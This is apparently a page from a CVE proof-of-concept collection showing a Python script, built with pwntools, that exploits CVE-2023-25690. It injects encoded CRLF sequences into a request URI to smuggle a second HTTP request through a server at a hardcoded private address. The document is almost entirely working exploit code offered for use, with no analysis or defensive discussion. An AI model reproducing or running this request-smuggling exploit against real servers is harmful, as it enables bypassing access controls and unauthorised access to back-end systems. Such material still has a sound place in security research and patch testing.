4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-25690
README.md
Rendering markdown...
POC / CVE-2023-25690.py PY
⬇ Raw GitHub ✕ Close 
from pwn import *


def request_prepare():
    hexdata = open("pre.txt", "rb").read()
    # print(hexdata)
    hexdata = hexdata.replace(b' ', b'%20')
    hexdata = hexdata.replace(b'\r\n', b'%0d%0a')
    hexdata = hexdata.replace(b'?', b'%3f')
    hexdata = hexdata.replace(b'=', b'%3d')
    # print(hexdata)
    uri = b'/categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0aUser-Agent:%20Mozilla/5.0%20(' \
          b'Windows%20NT%2010.0;%20Win64;%20x64;%20rv:120.0)%20Gecko/20100101%20Firefox/120.0%0d%0a%0d%0a' + hexdata + \
          b'%0d%0a%0d%0aGET%20/abc'
    reqst = b'''GET %b HTTP/1.1\r
Host: 192.168.27.139\r
\r
''' % uri
    return reqst


def send_and_recive(req):
    rec = b''
    ip = '192.168.27.139'
    port = 80
    p = remote(ip, int(port))
    p.send(req)
    rec += p.recv()
    print(rec.decode())
    p.close()
    return rec.decode()


req = request_prepare()
print(req)
# print(urllib.parse.unquote(req.decode()))
f = open('req.txt', 'wb')
f.write(req)
f.close()
res = send_and_recive(req)
f = open('res.txt', 'wb')
f.write(res.encode())
f.close()